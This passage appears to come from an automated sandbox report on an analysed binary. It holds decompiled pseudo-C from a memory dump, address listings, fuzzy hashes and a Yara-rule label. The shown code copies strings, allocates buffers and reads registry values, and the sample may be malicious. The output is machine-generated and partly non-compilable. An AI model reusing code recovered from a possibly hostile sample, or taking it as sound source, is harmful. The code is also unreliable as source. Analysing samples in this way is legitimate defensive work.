								_t469 =  *_t330;
								 *_t268 = _t469;
								if(_t469 != 0) {
									_v24 = _t306;
									_t316 = 0;
									_v68 = _t496;
									while(1) {
										_t316 = _t316 + 1;
										_t471 =  *((char*)(_t330 + _t316 * 2 - 1));
										 *((char*)(_t268 + _t316 * 2 - 1)) = _t471;
										if(_t471 == 0) {
											break;
										}
										_t472 =  *((char*)(_t330 + _t316 * 2));
										 *((char*)(_t268 + _t316 * 2)) = _t472;
										if(_t472 != 0) {
											continue;
										}
										break;
									}
									_t306 = _v24;
									_t496 = _v68;
									_t330 = _v44;
								}
							}
							_push(1);
							_push(_t330);
							_v64 = _t268;
							E008A10B0();
							_t268 = _v64;
							_t552 = _t552 + 8;
						}
						_v40 = _v60;
						_v44 = _t268;
					}
					 *((char*)(_t268 + _t522)) = 0x2a;
					 *((char*)(_t268 + _t522 + 1)) = 0;
				} else {
					_t268 = _v44;
				}
				if(_t268 == 0) {
					_t523 = 0;
				} else {
					_t463 = _t268 & 0x0000000f;
					if(_t463 == 0) {
						L103:
						asm("pxor xmm0, xmm0");
						_t531 =  ~( ~_t463 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [eax+edx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb ecx, xmm1");
							if(_t330 != 0) {
								break;
							}
							_t463 = _t463 + 0x10;
							if(_t463 < _t531) {
								continue;
							} else {
								if(_t531 >= 0x7fffffff) {
									L109:
									_t523 = 0x7fffffff;
								} else {
									while( *((char*)(_t531 + _t268)) != 0) {
										_t531 = _t531 + 1;
										if(_t531 < 0x7fffffff) {
											continue;
										} else {
											goto L109;
										}
										goto L110;
									}
									goto L238;
								}
							}
							goto L110;
						}
						asm("bsf esi, ecx");
						_t523 = _t531 + _t463;
						goto L238;
					} else {
						_t523 = 0;
						_t463 =  ~_t463 + 0x10;
						while( *((char*)(_t523 + _t268)) != 0) {
							_t523 = _t523 + 1;
							if(_t523 < _t463) {
								continue;
							} else {
								goto L103;
							}
							goto L110;
						}
						L238:
						if(_t523 == 0xfffffffe) {
							 *_t268 = 0;
						}
					}
				}
				L110:
				_t338 =  <=  ? 0x40 : _t523 + 2;
				if(_t338 > _v40) {
					_v64 = (_t338 >> 5 >> 0x1a) + _t338 >> 6;
					_t339 = _t338 & 0x8000003f;
					if(_t339 < 0) {
						_t339 = (_t339 - 0x00000001 | 0xffffffc0) + 1;
					}
					_t342 = _v64 + (0 | _t339 > 0x00000000) << 6;
					_v64 = _t342;
					_push(_t342);
					_t269 = E008A1030();
					_t552 = _t552 + 4;
					_t343 = _v44;
					if(_t343 == 0) {
						 *_t269 = 0;
					} else {
						if(_t269 != 0) {
							_t458 =  *_t343;
							 *_t269 = _t458;
							if(_t458 != 0) {
								_v24 = _t306;
								_t315 = 0;
								_v68 = _t496;
								while(1) {
									_t315 = _t315 + 1;
									_t460 =  *((char*)(_t343 + _t315 * 2 - 1));
									 *((char*)(_t269 + _t315 * 2 - 1)) = _t460;
									if(_t460 == 0) {
										break;
									}
									_t461 =  *((char*)(_t343 + _t315 * 2));
									 *((char*)(_t269 + _t315 * 2)) = _t461;
									if(_t461 != 0) {
										continue;
									}
									break;
								}
								_t306 = _v24;
								_t496 = _v68;
							}
						}
						_push(1);
						_push(_t343);
						_v68 = _t269;
						E008A10B0();
						_t269 = _v68;
						_t552 = _t552 + 8;
					}
					_v40 = _v64;
					_v44 = _t269;
				} else {
					_t269 = _v44;
				}
				goto L124;
			}

0x008b62fc
0x008b62fe
0x008b6300
0x008b6304
0x008b6306
0x008b630e
0x008b6310
0x008b6313
0x008b6317
0x008b6354
0x008b6319
0x008b631b
0x008b631d
0x008b6320
0x008b6324
0x008b6326
0x008b6329
0x008b632b
0x008b632b
0x008b632c
0x008b6331
0x008b6337
0x00000000
0x00000000
0x008b6339
0x008b633d
0x008b6342
0x00000000
0x00000000
0x00000000
0x008b6342
0x008b6344
0x008b6344
0x008b6324
0x008b6347
0x008b6349
0x008b634a
0x008b634f
0x008b634f
0x008b635c
0x008b6364
0x008b6365
0x008b6367
0x008b636a
0x008b636f
0x008b6372
0x008b6378
0x008b63d5
0x008b63d8
0x008b63e0
0x00000000
0x008b637a
0x008b637c
0x008b6dc0
0x008b6dc2
0x008b6dc3
0x008b6dc8
0x008b6dcb
0x008b6dd3
0x008b6dd5
0x00000000
0x008b6382
0x008b6382
0x008b6385
0x008b6389
0x008b638b
0x008b6393
0x008b6395
0x008b6398
0x008b6398
0x008b6399
0x008b639e
0x008b63a4
0x00000000
0x00000000
0x008b63a6
0x008b63aa
0x008b63af
0x00000000
0x00000000
0x00000000
0x008b63af
0x008b63b1
0x008b63b1
0x008b63b4
0x008b63b6
0x008b63b7
0x008b63bb
0x008b63c0
0x008b63c4
0x008b63c7
0x008b63cf
0x008b63e4
0x008b63e6
0x008b63e9
0x008b6401
0x008b6405
0x008b6411
0x008b6417
0x008b6417
0x008b641c
0x008b6420
0x008b6426
0x00000000
0x00000000
0x008b642c
0x008b6431
0x00000000
0x008b6433
0x008b6439
0x008b644e
0x008b644e
0x00000000
0x008b643b
0x008b643b
0x008b6445
0x008b644c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b644c
0x00000000
0x008b643b
0x008b6439
0x00000000
0x008b6431
0x008b6eb0
0x008b6eb3
0x00000000
0x008b63eb
0x008b63ed
0x008b63ef
0x008b63f2
0x008b63fc
0x008b63ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b63ff
0x008b6e93
0x008b6e96
0x008b6453
0x008b6453
0x008b6ea4
0x008b6ea4
0x008b6ea7
0x008b6ea7
0x00000000
0x008b68ea
0x008b68ea
0x008b68ee
0x008b68f6
0x008b68fb
0x008b6b4d
0x008b6b51
0x008b6b55
0x008b6b59
0x008b6b63
0x008b6b65
0x008b6b6d
0x008b6b7d
0x008b6b84
0x008b6baf
0x008b6bb5
0x008b6d25
0x008b6d29
0x008b6d2b
0x008b6d2b
0x008b6d32
0x008b6d34
0x008b6d3b
0x008b6d3d
0x008b6d40
0x008b6d44
0x008b6d83
0x008b6d46
0x008b6d48
0x008b6d4a
0x008b6d4d
0x008b6d51
0x008b6d53
0x008b6d57
0x008b6d59
0x008b6d59
0x008b6d5a
0x008b6d5f
0x008b6d65
0x00000000
0x00000000
0x008b6d67
0x008b6d6b
0x008b6d70
0x00000000
0x00000000
0x00000000
0x008b6d70
0x008b6d72
0x008b6d72
0x008b6d51
0x008b6d76
0x008b6d78
0x008b6d79
0x008b6d7e
0x008b6d7e
0x00000000
0x008b6d44
0x008b6bc4
0x008b6bc6
0x008b6bc9
0x008b6be1
0x008b6be5
0x008b6bf1
0x008b6bf7
0x008b6bf7
0x008b6bfc
0x008b6c00
0x008b6c06
0x00000000
0x00000000
0x008b6c0c
0x008b6c11
0x00000000
0x008b6c13
0x008b6c19
0x008b6c2e
0x008b6c2e
0x008b6c1b
0x008b6c1b
0x008b6c25
0x008b6c2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b6c2c
0x00000000
0x008b6c1b
0x008b6c19
0x00000000
0x008b6c11
0x008b6e2f
0x008b6e32
0x00000000
0x008b6bcb
0x008b6bcd
0x008b6bcf
0x008b6bd2
0x008b6bdc
0x008b6bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b6bdf
0x008b6e14
0x008b6e17
0x008b6e1d
0x008b6e21
0x008b6e27
0x008b6e27
0x008b6e21
0x008b6e17
0x008b6c33
0x008b6c38
0x008b6c3e
0x008b6c44
0x008b6c5a
0x008b6c5e
0x008b6c64
0x008b6c6c
0x008b6c6c
0x008b6c7a
0x008b6c7d
0x008b6c81
0x008b6c87
0x008b6c89
0x008b6c8c
0x008b6c90
0x008b6cdf
0x008b6c92
0x008b6c94
0x008b6c96
0x008b6c99
0x008b6c9d
0x008b6ca1
0x008b6ca4
0x008b6ca8
0x008b6caa
0x008b6caa
0x008b6cab
0x008b6cb0
0x008b6cb6
0x00000000
0x00000000
0x008b6cb8
0x008b6cbc
0x008b6cc1
0x00000000
0x00000000
0x00000000
0x008b6cc1
0x008b6cc3
0x008b6cc6
0x008b6cc6
0x008b6c9d
0x008b6cca
0x008b6ccc
0x008b6ccd
0x008b6cd1
0x008b6cd6
0x008b6cda
0x008b6cda
0x008b6ce6
0x008b6ce9
0x008b6c46
0x008b6c46
0x008b6c46
0x008b6ceb
0x008b6cef
0x008b6cfd
0x008b6d01
0x008b6d03
0x008b6d09
0x008b6d09
0x008b6d0c
0x008b6d0d
0x008b6d11
0x00000000
0x00000000
0x008b6d1d
0x00000000
0x008b6d23
0x008b6d07
0x008b6d08
0x00000000
0x008b6d08
0x00000000
0x008b6d1d
0x00000000
0x008b6d09
0x008b6cef
0x00000000
0x008b6b86
0x008b6b8a
0x008b6b8b
0x008b6b8c
0x008b6b8d
0x008b6b8e
0x008b6b8f
0x008b6b8f
0x008b6901
0x008b6901
0x008b6905
0x008b6908
0x008b690c
0x008b6910
0x008b6914
0x008b691e
0x008b6920
0x008b6928
0x008b6938
0x008b693f
0x008b696a
0x008b6970
0x008b6ae0
0x008b6ae4
0x008b6ae6
0x008b6ae6
0x008b6aed
0x008b6af3
0x008b6afa
0x008b6afc
0x008b6aff
0x008b6b03
0x008b6b45
0x008b6b05
0x008b6b07
0x008b6b09
0x008b6b0c
0x008b6b10
0x008b6b12
0x008b6b16
0x008b6b18
0x008b6b18
0x008b6b19
0x008b6b1e
0x008b6b24
0x00000000
0x00000000
0x008b6b26
0x008b6b2a
0x008b6b2f
0x00000000
0x00000000
0x00000000
0x008b6b2f
0x008b6b31
0x008b6b31
0x008b6b10
0x008b6b35
0x008b6b37
0x008b6b38
0x008b6b3d
0x008b6b3d
0x008b6d86
0x008b6d86
0x008b6d88
0x008b6d88
0x008b697f
0x008b6981
0x008b6984
0x008b699c
0x008b69a0
0x008b69ac
0x008b69b2
0x008b69b2
0x008b69b7
0x008b69bb
0x008b69c1
0x00000000
0x00000000
0x008b69c7
0x008b69cc
0x00000000
0x008b69ce
0x008b69d4
0x008b69e9
0x008b69e9
0x008b69d6
0x008b69d6
0x008b69e0
0x008b69e7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b69e7
0x00000000
0x008b69d6
0x008b69d4
0x00000000
0x008b69cc
0x008b6e0d
0x008b6e10
0x00000000
0x008b6986
0x008b6988
0x008b698a
0x008b698d
0x008b6997
0x008b699a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b699a
0x008b6df2
0x008b6df5
0x008b6dfb
0x008b6dff
0x008b6e05
0x008b6e05
0x008b6dff
0x008b6df5
0x008b69ee
0x008b69f3
0x008b69f9
0x008b69ff
0x008b6a15
0x008b6a19
0x008b6a1f
0x008b6a27
0x008b6a27
0x008b6a35
0x008b6a38
0x008b6a3c
0x008b6a42
0x008b6a44
0x008b6a47
0x008b6a4b
0x008b6a9a
0x008b6a4d
0x008b6a4f
0x008b6a51
0x008b6a54
0x008b6a58
0x008b6a5c
0x008b6a5f
0x008b6a63
0x008b6a65
0x008b6a65
0x008b6a66
0x008b6a6b
0x008b6a71
0x00000000
0x00000000
0x008b6a73
0x008b6a77
0x008b6a7c
0x00000000
0x00000000
0x00000000
0x008b6a7c
0x008b6a7e
0x008b6a81
0x008b6a81
0x008b6a58
0x008b6a85
0x008b6a87
0x008b6a88
0x008b6a8c
0x008b6a91
0x008b6a95
0x008b6a95
0x008b6aa1
0x008b6aa4
0x008b6a01
0x008b6a01
0x008b6a01
0x008b6aa6
0x008b6aaa
0x008b6ab8
0x008b6abc
0x008b6abe
0x008b6ac4
0x008b6ac4
0x008b6ac7
0x008b6ac8
0x008b6acc
0x00000000
0x00000000
0x008b6ad8
0x008b6dec
0x008b6dec
0x008b6ade
0x008b6ac2
0x008b6ac3
0x00000000
0x008b6ac3
0x00000000
0x008b6ad8
0x008b6de2
0x008b6de2
0x008b6de6
0x008b6de6
0x008b6aaa
0x008b6d8f
0x008b6d8f
0x008b6d91
0x008b6d92
0x008b6d9a
0x008b6d9c
0x008b6da0
0x008b6dac
0x008b6db0
0x008b6dbd
0x008b6941
0x008b6945
0x008b6946
0x008b6947
0x008b6948
0x008b6949
0x008b694a
0x008b694a
0x008b693f
0x008b68fb
0x008b63e9
0x008b637c
0x008b6458
0x008b645d
0x008b6463
0x008b6468
0x008b647d
0x008b6480
0x008b6484
0x008b648a
0x008b6492
0x008b6492
0x008b649f
0x008b64a2
0x008b64a6
0x008b64a7
0x008b64ac
0x008b64af
0x008b64b5
0x008b6504
0x008b64b7
0x008b64b9
0x008b64bb
0x008b64be
0x008b64c2
0x008b64c6
0x008b64ca
0x008b64cc
0x008b64cf
0x008b64cf
0x008b64d0
0x008b64d5
0x008b64db
0x00000000
0x00000000
0x008b64dd
0x008b64e1
0x008b64e6
0x00000000
0x00000000
0x00000000
0x008b64e6
0x008b64e8
0x008b64ec
0x008b64ec
0x008b64c2
0x008b64ef
0x008b64f1
0x008b64f2
0x008b64f6
0x008b64fb
0x008b64ff
0x008b64ff
0x008b650b
0x008b650f
0x008b646a
0x008b646a
0x008b646a
0x008b6513
0x008b651f
0x008b6524
0x008b652f
0x008b6535
0x008b6e8c
0x008b653b
0x008b653d
0x008b6540
0x008b6558
0x008b655c
0x008b6568
0x008b656e
0x008b656e
0x008b6573
0x008b6577
0x008b657d
0x00000000
0x00000000
0x008b6583
0x008b6588
0x00000000
0x008b658a
0x008b6590
0x008b65a5
0x008b65a5
0x008b6592
0x008b6592
0x008b659c
0x008b65a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b65a3
0x00000000
0x008b6592
0x008b6590
0x00000000
0x008b6588
0x008b6e85
0x008b6e88
0x00000000
0x008b6542
0x008b6544
0x008b6546
0x008b6549
0x008b6553
0x008b6556
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b6556
0x008b6e74
0x008b6e77
0x008b6e7d
0x008b6e7d
0x008b6e77
0x008b6540
0x008b65aa
0x008b65b5
0x008b65bc
0x008b65d4
0x008b65d8
0x008b65de
0x008b65e6
0x008b65e6
0x008b65f4
0x008b65f7
0x008b65fb
0x008b65fc
0x008b6601
0x008b6604
0x008b660a
0x008b6659
0x008b660c
0x008b660e
0x008b6610
0x008b6613
0x008b6617
0x008b661b
0x008b661f
0x008b6621
0x008b6624
0x008b6624
0x008b6625
0x008b662a
0x008b6630
0x00000000
0x00000000
0x008b6632
0x008b6636
0x008b663b
0x00000000
0x00000000
0x00000000
0x008b663b
0x008b663d
0x008b6641
0x008b6641
0x008b6617
0x008b6644
0x008b6646
0x008b6647
0x008b664b
0x008b6650
0x008b6654
0x008b6654
0x008b6660
0x008b6664
0x008b65be
0x008b65be
0x008b65be
0x008b6668
0x008b6670
0x008b6675
0x008b667b
0x008b6e6d
0x008b6681
0x008b6683
0x008b6686
0x008b669e
0x008b66a2
0x008b66ae
0x008b66b4
0x008b66b4
0x008b66b9
0x008b66bd
0x008b66c3
0x00000000
0x00000000
0x008b66c9
0x008b66ce
0x00000000
0x008b66d0
0x008b66d6
0x008b66eb
0x008b66eb
0x008b66d8
0x008b66d8
0x008b66e2
0x008b66e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b66e9
0x00000000
0x008b66d8
0x008b66d6
0x00000000
0x008b66ce
0x008b6e66
0x008b6e69
0x00000000
0x008b6688
0x008b668a
0x008b668c
0x008b668f
0x008b6699
0x008b669c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b669c
0x008b6e55
0x008b6e58
0x008b6e5e
0x008b6e5e
0x008b6e58
0x008b6686
0x008b66f0
0x008b66f0
0x008b66fb
0x008b6702
0x008b6712
0x008b6715
0x008b6719
0x008b671f
0x008b6727
0x008b6727
0x008b6734
0x008b6737
0x008b673b
0x008b673c
0x008b6741
0x008b6744
0x008b674a
0x008b679d
0x008b674c
0x008b674e
0x008b6750
0x008b6753
0x008b6757
0x008b675b
0x008b675f
0x008b6761
0x008b6764
0x008b6764
0x008b6765
0x008b676a
0x008b6770
0x00000000
0x00000000
0x008b6772
0x008b6776
0x008b677b
0x00000000
0x00000000
0x00000000
0x008b677b
0x008b677d
0x008b6781
0x008b6784
0x008b6784
0x008b6757
0x008b6788
0x008b678a
0x008b678b
0x008b678f
0x008b6794
0x008b6798
0x008b6798
0x008b67a4
0x008b67a8
0x008b67a8
0x008b67ac
0x008b67b0
0x008b6526
0x008b6526
0x008b6526
0x008b67b7
0x008b6e4e
0x008b67bd
0x008b67bf
0x008b67c2
0x008b67da
0x008b67de
0x008b67ea
0x008b67f0
0x008b67f0
0x008b67f5
0x008b67f9
0x008b67ff
0x00000000
0x00000000
0x008b6805
0x008b680a
0x00000000
0x008b680c
0x008b6812
0x008b6827
0x008b6827
0x008b6814
0x008b6814
0x008b681e
0x008b6825
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b6825
0x00000000
0x008b6814
0x008b6812
0x00000000
0x008b680a
0x008b6e47
0x008b6e4a
0x00000000
0x008b67c4
0x008b67c6
0x008b67c8
0x008b67cb
0x008b67d5
0x008b67d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b67d8
0x008b6e36
0x008b6e39
0x008b6e3f
0x008b6e3f
0x008b6e39
0x008b67c2
0x008b682c
0x008b6837
0x008b683e
0x008b6856
0x008b685a
0x008b6860
0x008b6868
0x008b6868
0x008b6876
0x008b6879
0x008b687d
0x008b687e
0x008b6883
0x008b6886
0x008b688c
0x008b68db
0x008b688e
0x008b6890
0x008b6892
0x008b6895
0x008b6899
0x008b689d
0x008b68a1
0x008b68a3
0x008b68a6
0x008b68a6
0x008b68a7
0x008b68ac
0x008b68b2
0x00000000
0x00000000
0x008b68b4
0x008b68b8
0x008b68bd
0x00000000
0x00000000
0x00000000
0x008b68bd
0x008b68bf
0x008b68c3
0x008b68c3
0x008b6899
0x008b68c6
0x008b68c8
0x008b68c9
0x008b68cd
0x008b68d2
0x008b68d6
0x008b68d6
0x008b68e2
0x008b68e6
0x008b6840
0x008b6840
0x008b6840
0x00000000

Strings

@, xrefs: 008B6DCB

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction ID: 1dcef221e49b233e5fad3a214ed7a4a73789e9e6adea97540628926b7377cde0
Opcode Fuzzy Hash: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction Fuzzy Hash: C2724E749087524BD729CE29C49036A7BD2FFD6314F2CC66CD8A58B396FA39CC618742

Uniqueness

Uniqueness Score: -1.00%

Function 00896AD0, Relevance: 2.2, Strings: 1, Instructions: 932
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00896AD0(void* __ebx, char __ecx, char __edx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v120;
				char _v176;
				char _v192;
				char _v216;
				char _v240;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v260;
				intOrPtr _v264;
				char _v268;
				char _v276;
				char _v280;
				char _v284;
				char _v304;
				char _v312;
				char _v320;
				char _v328;
				char _v340;
				char _v344;
				char _v348;
				signed int _v352;
				signed int _v360;
				short _v364;
				char _v368;
				char _v376;
				void* _v380;
				char _v404;
				char _v408;
				signed int _v420;
				char _v440;
				intOrPtr _v448;
				char _v452;
				char _v456;
				char _v464;
				char _v468;
				signed int _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v508;
				char _v512;
				char _v516;
				char _v524;
				char _v528;
				char _v532;
				void* _v540;
				char _v552;
				char _v556;
				signed int _v560;
				char _v564;
				char _v568;
				char _v572;
				void* _v576;
				char _v580;
				signed int _v584;
				char _v588;
				signed int _v592;
				void* _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				signed int _v608;
				void* _v612;
				char _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				signed int* _v628;
				signed int _v632;
				signed int _v636;
				char _v640;
				signed int _v644;
				char _v648;
				char _v652;
				signed int _v656;
				signed int _v660;
				char _v664;
				char _v668;
				char _v672;
				char _v676;
				void* _v680;
				char _v684;
				intOrPtr* _v688;
				char _v692;
				void* _v696;
				char _v700;
				void* _v704;
				char _v708;
				void* _v712;
				char _v720;
				void* _v728;
				void* _v732;
				void* _v736;
				void* _v740;
				void* _v744;
				void* _v748;
				void* _v752;
				void* _v760;
				void* _v764;
				void* _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v800;
				void* _v804;
				void* _v808;
				void* _v812;
				void* _v816;
				void* _v824;
				void* _v836;
				void* _v840;
				void* _v844;
				void* _v848;
				void* _v852;
				void* _v948;
				void* _v956;
				signed int _t329;
				signed int _t330;
				intOrPtr _t375;
				intOrPtr* _t382;
				intOrPtr _t389;
				void* _t400;
				signed int _t416;
				signed int _t417;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t449;
				void* _t454;
				signed int _t467;
				signed int _t476;
				signed int _t478;
				void* _t497;
				signed int _t506;
				signed int _t507;
				signed int _t519;
				void* _t521;
				signed int _t529;
				signed int _t535;
				signed int _t547;
				signed int _t549;
				signed int _t551;
				signed int _t561;
				signed int _t565;
				signed int _t567;
				signed int _t579;
				signed int _t591;
				signed int _t592;
				signed short* _t594;
				signed int _t600;
				void* _t602;
				intOrPtr* _t603;
				void* _t610;
				signed int _t755;
				signed int _t804;
				signed int* _t808;
				void* _t810;
				signed int _t849;
				signed int _t850;
				signed int _t853;
				signed int* _t855;
				signed int _t860;
				signed int _t861;
				signed int* _t862;
				signed int _t864;
				signed int _t867;
				intOrPtr _t868;
				void* _t871;
				signed int _t872;
				signed int _t874;
				signed int _t876;
				signed int _t878;

				_t874 = _t876;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t878 = (_t876 & 0xfffffff0) - 0x274;
				_v192 = __ecx;
				_v640 = __edx;
				_t867 =  *0x8cb000; // 0xffffffff
				_v644 = (E008A3930(__ebx, 0, __edi, _t867))[2] & 0x000000ff;
				_t855 = E008A3930(__ebx, 0, __edi, _t867);
				_t329 =  *0x8cb260; // 0xec1fb0
				_v636 = _t329;
				if(_t329 == 0) {
					_push(0x10);
					_t330 = E008A1030();
					_v636 = _t330;
					_t878 = _t878 + 4;
					__eflags = _v636;
					if(_v636 == 0) {
						_v636 = 0;
					} else {
						_t853 = _t330;
						 *((intOrPtr*)(_t853 + 4)) = 0;
						 *((intOrPtr*)(_t853 + 8)) = 0;
						 *((intOrPtr*)(_t853 + 0xc)) = 0;
					}
					_t808 = _v636;
					 *0x8cb260 = _t808;
					 *_t808 =  *0x8cb024 & 0x0000ffff;
					__eflags = ( *0x8cb02b & 0x000000ff) - 0xa;
					if(( *0x8cb02b & 0x000000ff) <= 0xa) {
					}
					__eflags =  *0x8cb02b & 0x000000ff;
					if(( *0x8cb02b & 0x000000ff) > 0) {
						__eflags = 0;
						_v584 = _t867;
						_t872 = 0;
						do {
							_v360 = 0;
							_t850 = _t872 + _t872 * 2;
							_v368 =  *((intOrPtr*)(0x8cb02c + _t850 * 2));
							_v364 =  *(0x8cb030 + _t850 * 2) & 0x0000ffff;
							E008C3100( &_v344,  &_v368, _t874,  &_v344);
							_t804 =  *0x8cb260; // 0xec1fb0
							E008B37E0(_t804 + 4, _v348,  *((intOrPtr*)(_t804 + 4)));
							E008B0B10( &_v344);
							_t872 = _t872 + 1;
							__eflags = _t872 - ( *0x8cb02b & 0x000000ff);
						} while (_t872 < ( *0x8cb02b & 0x000000ff));
						_t579 =  *0x8cb260; // 0xec1fb0
						_t867 = _v584;
						_v636 = _t579;
					}
				}
				_t810 =  !=  ? 0x10 : _t855[3] & 0x000000ff;
				_t610 =  !=  ? 0 : 0x20;
				_t585 =  !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20;
				_t813 =  <=  ? 0 : 0x80;
				_t586 = ( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80);
				_t587 = ( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff;
				_t588 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 8;
				_t589 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010;
				_t590 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855;
				E008B06A0( &_v240, _t874, 0);
				_push(0);
				E008B9350( &_v304);
				E008BB360( &_v240);
				E008B0B30( &_v248, 0, _v240);
				E008B0B10( &_v244);
				_v120 = E008B6040(_v252, 0x7fffffff);
				E008B9710( &_v312,  &_v120, 1);
				_v652 = _v260;
				E008B9710( &_v320, _v652, E008B6040(_v260, 0x7fffffff));
				E008BBA80((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855,  &_v312, _t855, _t867, _t874);
				_push(0);
				_push( &_v260);
				E008B9EB0((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855,  &_v312, _t855, _t867);
				E008B1240( &_v268,  &_v260);
				E008B0B30( &_v280, 0x7fffffff, _v264);
				E008B0B10( &_v268);
				E008B0B10( &_v276);
				E008B9510( &_v328);
				_v676 = _v284;
				E008B9710( &_v344, _v676, E008B6040(_v284, 0x7fffffff));
				_v216 = E008A0B50( *_v688);
				E008B9710( &_v352,  &_v216, 2);
				_v248 = E008A0B60((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855);
				E008B9710( &_v360,  &_v248, 4);
				_v248 = _v708;
				E008B9710( &_v368,  &_v248, 4);
				_t822 =  &_v176;
				_v176 = _v720;
				E008B9710( &_v376,  &_v176, 1);
				_t886 =  *0x8cb264;
				if( *0x8cb264 == 0) {
					 *0x8cb264 = 1;
					E008B06A0(_t878 + 0xe0, _t874, 0);
					E008B0D40(E008B0D40(E008B0D40( &_v440, 0x2e), 0x4b), 0x42);
					E008A8810( &_v532, 0);
					E008A96D0(E008A96D0(E008A96D0(E008A96D0(_t878 + 0x90, 0x20), 0x28), 0x4b), 0x42);
					asm("movups xmm0, [0x8c9400]");
					_t375 =  *0x8c9410; // 0x13401ec1
					asm("movups [esp], xmm0");
					_v676 = _t375;
					_push(0);
					E008B9350( &_v568);
					_v628 = _t855;
					_t591 = 0;
					__eflags = 0;
					_v636 = _t867;
					do {
						E008B9670( &_v572, E008B9650( &_v572) + 4);
						_t868 =  *((intOrPtr*)(_t878 + _t591 * 4));
						_t382 = E008B9640( &_v572, E008B9650( &_v572) + 0xfffffffc);
						_t591 = _t591 + 1;
						 *_t382 = _t868;
						__eflags = _t591 - 5;
					} while (_t591 < 5);
					_t592 = 0;
					__eflags = 0;
					_t857 = _v592;
					_t869 = _v600;
					_v568 = 0;
					_v564 = 0;
					_v560 = 0;
					do {
						_push(0);
						E008BC550(_t592,  &_v556, _t869, _t874, _t878 + 0x84, 0x80000002);
						E008BCE00(_t592,  &_v568, _t857, _t869, _t874,  &_v340);
						E008A8810( &_v472, 0);
						E008A8810( &_v468, 0);
						__eflags = _v352;
						if(_v352 > 0) {
							_v604 = _t592;
							_t871 = 0;
							__eflags = 0;
							do {
								_t603 = E008B7600(_t878 + 0x150, _t871);
								_t535 = E008B1000(_t603);
								__eflags = _t535;
								if(_t535 == 0) {
									__eflags = E008B1460(_t603, _v448);
									if(__eflags == 0) {
										_push(_v560);
										_push(0);
										E008BBF30( &_v652, __eflags,  *_t603);
										_t857 =  &_v644;
										E008BC580( &_v664, _t822,  &_v644, 0xffa790dd);
										E008BCAE0( &_v672,  &_v644, _v652);
										E008B0B10( &_v644);
										E008AF6E0( &_v652,  &_v644);
										E008A8CC0(_t878 + 0xd0, _v648);
										E008A8CA0( &_v652);
										E008A8CA0( &_v660);
										_t547 = E008A9DC0(_t878 + 0xcc);
										__eflags = _t547;
										if(_t547 != 0) {
											L70:
											E008A8CA0( &_v648);
											__eflags = _v652;
											if(_v652 != 0) {
												_t822 = _v656;
												__eflags = _t822;
												if(_t822 == 0) {
													L74:
													_t549 = 1;
												} else {
													__eflags = _t822 - 0xffffffff;
													if(_t822 == 0xffffffff) {
														goto L74;
													} else {
														_t549 = 0;
													}
												}
												__eflags = _t549;
												if(_t549 == 0) {
													E008BBF00(_t822);
												}
											}
											_v656 = 0;
											goto L38;
										} else {
											_t551 = E008AA330( &_v472, _t871,  *((intOrPtr*)(_t878 + 0x8c)));
											__eflags = _t551;
											if(_t551 == 0) {
												_t857 = _t878;
												E008BC580( &_v660, _t822, _t878, 0x494c03d0);
												E008BCAE0( &_v668,  &_v640, _v684);
												E008B0B10(_t878);
												E008AF6E0( &_v648,  &_v640);
												E008A8CC0( &_v484, _v644);
												E008A8CA0( &_v648);
												E008A8CA0( &_v656);
												_t561 = E008A9DC0( &_v488);
												__eflags = _t561;
												if(_t561 == 0) {
